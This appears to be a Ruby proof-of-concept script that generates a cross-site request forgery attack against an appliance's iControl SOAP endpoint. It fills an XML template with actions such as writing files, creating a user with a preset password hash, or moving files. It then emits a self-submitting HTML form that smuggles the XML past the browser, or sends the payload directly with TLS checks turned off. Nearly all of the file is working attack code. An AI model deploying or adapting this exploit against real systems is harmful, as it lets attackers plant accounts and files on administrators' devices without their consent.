require 'httparty'
require 'base64'

# Print the command-line synopsis to stderr and terminate the process.
# Invoked whenever a required positional argument is missing or the
# template cannot be read; it never returns.
def usage
  $stderr.write("ruby #{$0} <target> <xml_template> [username:password]\n")
  exit
end

# First positional argument: the host (or host:port) the request is aimed at.
# Falls back to usage(), which exits, when it is absent.
TARGET = ARGV.first || usage()
# iControl SOAP endpoint on that host; the scheme is always https.
TARGET_URL = "https://#{TARGET}/iControl/iControlPortal.cgi"

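# Second positional argument: path of the SOAP XML template to fill in.
TEMPLATE_FILE = ARGV[1] || usage()
begin
  TEMPLATE = File.read(TEMPLATE_FILE)
rescue StandardError => e
  # Report the actual failure (ENOENT, EACCES, EISDIR, ...) instead of
  # claiming "not found" for every error, then fall through to usage(),
  # which exits.
  $stderr.puts "Cannot read template #{TEMPLATE_FILE}: #{e.message}"
  $stderr.puts
  usage()
end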

# Optional third argument, "username:password". When present the script
# sends the request itself (authenticated mode); otherwise it emits an
# HTML page.
ACCOUNT = ARGV[2]
unless ACCOUNT.nil?
  $stderr.puts <<~NOTE
    NOTE: You've provided a username and password, which means this is going
    to authenticate, and therefore isn't an exploit

    Don't enter a username:password if you want to generate a CSRF exploit!
  NOTE
end

# Set up some defaults
# Default value offered for each %%%NAME%%% placeholder found in the template.
# The user is prompted per placeholder; an empty answer takes the default.
DEFAULTS = {
  'FILENAME'        => '/tmp/csrfdemo.txt',
  'BASE64FILEDATA'  => 'SGVsbG8gd29ybGQh', # base64 of "Hello world!"
  'USERNAME'        => 'rontest',
  'FULLNAME'        => 'Ron Test',
  # crypt(3) SHA-512 hash; the original comment gives the plaintext as "Password1"
  'CRYPTSHA512HASH' => '$6$T2mT4PeYSuyg/hSr$y/rN9tol5t1fRxTBqFVtxLzRfUBXt16yNahqYTaVVZa3PITfoAKBnuzqvwBT77qNBV4JjgwdhzqmsMk78bo6d0',
  'FROM_FILENAME'   => '/tmp/file1',
  'TO_FILENAME'     => '/tmp/file2'
}

# Milliseconds the generated page waits before auto-submitting its form.
DELAY = 1_000

# Fill in the template
# Fill in the template: every %%%NAME%%% token is replaced by a value read
# interactively from stdin, or by DEFAULTS[NAME] when the answer is empty
# (or stdin is exhausted). A NAME with no default and no answer becomes "".
REQUEST = TEMPLATE.gsub(/%%%[a-zA-Z0-9_]+%%%/) do |placeholder|
  key = placeholder.delete('%')
  $stderr.print "Value for #{key} [#{DEFAULTS[key]}]: "
  $stderr.flush

  entered = $stdin.gets&.chomp
  entered.nil? || entered.empty? ? DEFAULTS[key] : entered
end

if ACCOUNT
  # Authenticated mode: the script delivers the filled-in template itself.
  $stderr.puts "Sending the following payload directly to #{TARGET}..."
  $stderr.puts
  $stderr.puts REQUEST

  # NOTE(review): verify: false turns off TLS certificate validation, so the
  # credentials in the authorization header go to whatever answers at
  # TARGET_URL, not necessarily the intended device.
  response = HTTParty.post(
    TARGET_URL,
    verify: false,
    headers: { authorization: Base64.encode64(ACCOUNT), 'content-type': 'text/xml' },
    body: REQUEST
  )
  $stderr.puts
  $stderr.puts 'Response:'
  $stderr.puts response
  $stderr.puts
  $stderr.puts '---'

  # The endpoint signals failure inside the body; surface the first
  # error_string line and exit non-zero.
  failure = response.body[/(error_string.*)/, 1]
  if failure
    $stderr.puts 'Something went wrong:'
    $stderr.puts
    $stderr.puts failure
    exit 1
  end
else
  # Page mode: print a self-submitting form whose text/plain body carries the
  # XML. Angle brackets in REQUEST are entity-encoded so the textarea content
  # survives HTML parsing unchanged.
  escaped = REQUEST.gsub(/[<>]/, '<' => '&lt;', '>' => '&gt;')
  puts <<-HTML

      <form id="form" method="post" action="#{TARGET_URL}" enctype="text/plain">
        <textarea id="payload" name="&lt;!--">--&gt;#{escaped}</textarea>
        <input type=submit>
      </form>

      <script>
        setTimeout(function() {
          document.getElementById("form").submit();
        }, #{DELAY});
      </script>
  HTML
end